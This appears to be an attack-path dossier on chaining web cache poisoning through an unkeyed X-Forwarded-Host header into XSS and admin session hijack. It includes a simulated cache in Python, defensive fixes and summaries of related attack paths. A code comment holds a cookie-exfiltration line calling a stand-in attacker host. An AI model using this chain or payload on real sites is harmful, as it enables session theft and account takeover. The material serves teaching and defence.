Web cache poisoning → XSS → admin session hijack
An unkeyed header reflects into the response. Poison the cache with a payload, wait for an admin to fetch the cached page, exfiltrate their session.
§ Context
Assumed environment: a shared cache (Varnish / Cloudflare / Akamai) keys on path+query but not on the vulnerable header. An admin user fetches the cached path periodically.
§ Steps
- 01 Identify unkeyed header reflection | Reconnaissance | W-CACHE-POISON — Web Cache Poisoning
  Classic candidates: X-Forwarded-Host, X-Forwarded-Scheme, X-Original-URL. Test with a cache-buster in the query string so you hit a fresh entry instead of poisoning the live one; the header is unkeyed if a second request for the same buster, sent without the header, still returns the injected value as a cache hit (Age / X-Cache headers show the hit).
- 02 Craft XSS payload via header | Execution | W-XSS-REFLECTED — Reflected XSS
  The reflected value typically lands in a script or resource URL (X-Forwarded-Host) or a redirect Location (X-Forwarded-Scheme), so the payload is an attacker-controlled host or a quote break-out, not a bare <script> tag.
- 03 Poison cache entry | Initial Access | W-CACHE-POISON — Web Cache Poisoning
  Request the exact path the admin uses, without a buster, with the payload header set; the response must be cacheable (public Cache-Control, no Vary on the header) and stays poisoned until its TTL expires, then must be re-poisoned.
- 04 Wait for admin to hit cached path | Initial Access | (no separate technique: the shared cache serves the poisoned entry to every requester of that path)
- 05 Exfil admin session cookie | Credential Access | T1539 — Steal Web Session Cookie
  document.cookie only yields the session if it is not HttpOnly; otherwise the payload must act from inside the admin's browser (authenticated requests to admin endpoints) rather than exfiltrating the token.
- 06 Admin account takeover | Initial Access | T1078 — Valid Accounts
  Replay the stolen cookie from the attacker's browser; the application sees a valid, MFA-completed session.
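The chain above, as an added example that is not part of this dossier: a miniature shared cache in front of an origin that builds a script URL from X-Forwarded-Host. It shows the step 01 probe (cache-buster, then re-request without the header), the step 03/04 poisoning and admin hit, and the three defensive variants (key on the header, strip it at the edge, or stop trusting it at the origin). The hostnames, path and canary are constructed for the example.

```python
"""Added example: simulated shared cache + reflecting origin (not the dossier's code)."""
import time

# Constructed names for the example; nothing here refers to a real site.
CANONICAL_HOST = "shop.example"
ATTACKER_HOST = "attacker.example"   # the attacker serves /static/app.js here, e.g.
                                     # fetch("https://attacker.example/c?" + document.cookie)


def origin(path, headers, trust_xfh=True):
    """Origin behaviour. trust_xfh=True is the vulnerable pattern: the absolute
    script URL is built from X-Forwarded-Host, so whoever controls that header
    controls which script the page loads. trust_xfh=False is the origin-side fix:
    always use the configured canonical host."""
    host = headers.get("X-Forwarded-Host", CANONICAL_HOST) if trust_xfh else CANONICAL_HOST
    body = f'<html><script src="//{host}/static/app.js"></script><p>{path}</p></html>'
    return {"body": body, "max_age": 300}      # public, cacheable for 5 minutes


class SharedCache:
    """Minimal shared cache keyed on path+query by default (the dossier's assumption).
    keyed_headers: extra headers folded into the cache key (Varnish: hash_data in vcl_hash).
    stripped_headers: headers dropped at the edge before the origin sees them
    (Varnish: unset req.http.X-Forwarded-Host in vcl_recv)."""

    def __init__(self, keyed_headers=(), stripped_headers=(), trust_xfh=True):
        self.keyed = tuple(keyed_headers)
        self.stripped = set(stripped_headers)
        self.trust_xfh = trust_xfh
        self.store = {}                        # key -> (body, expiry)

    def _key(self, path, query, headers):
        return (path, query) + tuple(headers.get(h, "") for h in self.keyed)

    def fetch(self, path, query="", headers=None):
        """Serve a request; returns (body, was_cache_hit)."""
        headers = {k: v for k, v in (headers or {}).items() if k not in self.stripped}
        key = self._key(path, query, headers)
        now = time.monotonic()
        cached = self.store.get(key)
        if cached and now < cached[1]:
            return cached[0], True
        resp = origin(path, headers, self.trust_xfh)
        self.store[key] = (resp["body"], now + resp["max_age"])
        return resp["body"], False


def probe_unkeyed_reflection(cache, path, header, canary):
    """Step 01 check. A fresh cache-buster keeps the probe off the live entry.
    If the canary comes back on a second request that omits the header and is a
    cache hit, the header is reflected AND not part of the key."""
    buster = f"cb={int(time.monotonic() * 1e6)}"
    cache.fetch(path, buster, {header: canary})
    body, was_hit = cache.fetch(path, buster)
    return was_hit and canary in body


def poison_and_serve(cache, path):
    """Steps 03-04. The attacker primes the entry for the real path (no buster);
    the admin's ordinary request then gets the poisoned body from cache."""
    cache.fetch(path, headers={"X-Forwarded-Host": ATTACKER_HOST})
    admin_body, was_hit = cache.fetch(path)
    return was_hit and ATTACKER_HOST in admin_body


if __name__ == "__main__":
    target = "/admin/dashboard"
    for name, cache in [
        ("vulnerable", SharedCache()),
        ("header keyed", SharedCache(keyed_headers=("X-Forwarded-Host",))),
        ("header stripped", SharedCache(stripped_headers=("X-Forwarded-Host",))),
        ("origin ignores XFH", SharedCache(trust_xfh=False)),
    ]:
        probe = probe_unkeyed_reflection(cache, target, "X-Forwarded-Host", "canary.example")
        print(f"{name:20s} probe={probe} poisoned_admin={poison_and_serve(cache, target)}")
```

Against a real cache the hit/miss flag comes from the Age or X-Cache response headers rather than a return value, and the probe must be repeated per path because only responses the cache actually stores can be poisoned. Any one of the three defensive variants breaks the chain on its own; keying on the header still lets the attacker poison the entry for requests that carry the same header value, so stripping or ignoring it is the stronger fix.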
§ References
- T1078Valid Accounts
- T1539Steal Web Session Cookie
§ Frequently asked
- What is the "Web cache poisoning → XSS → admin session hijack" attack path?
- An unkeyed header reflects into the response. Poison the cache with a payload, wait for an admin to fetch the cached page, exfiltrate their session. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Identify unkeyed header reflection (W-CACHE-POISON), a reconnaissance step that needs nothing more than unauthenticated HTTP access to the cached path. Assumed environment: a shared cache (Varnish / Cloudflare / Akamai) keys on path+query but not on the vulnerable header, and the origin reflects that header into a cacheable response.
- What is the final impact of this kill-chain?
- The final step lands on Admin account takeover (T1078 — Valid Accounts), which falls under Initial Access: the attacker replays the stolen session cookie and is treated as the admin without touching the login or MFA flow. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. For the session theft and replay steps, refer to the linked MITRE ATT&CK entries under "References" (T1539, T1078); each lists defensive controls, detection telemetry, and known threat-actor usage. The cache-poisoning and XSS steps are web-specific and not ATT&CK techniques: either strip the untrusted headers at the edge or include them in the cache key (in Varnish, `unset req.http.X-Forwarded-Host` in `vcl_recv`, or `hash_data(req.http.X-Forwarded-Host)` in `vcl_hash`), make the origin build URLs from its configured host rather than from request headers, encode reflected values, and mark the session cookie HttpOnly so a script cannot read it. Cache hit rates for admin paths and origin logs showing X-Forwarded-Host values that are not your own domains are the cheapest telemetry.
§ Related dossiers
- Shared techniques: 2
5G core GTP-U user-plane injection → subscriber MITM
Attacker on a transit network between mobile-core hops (or with compromised UPF). GTP-U packets are typically unfiltered between PEs; inject packets into subscriber bearers — credential capture, free-of-charge tunnels, downstream attacks.
- Shared techniques: 2
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- Shared techniques: 2
F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB
Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- Shared techniques: 2
Citrix Bleed → steal authenticated session → MFA bypass
Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.
- Shared techniques: 2
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
- Shared techniques: 2
Compromised extension auto-update → fleet compromise
Take over a popular extension's developer account (credential stuffing on the store, abandoned email domain). Push a malicious version — every existing install runs attacker code on next launch.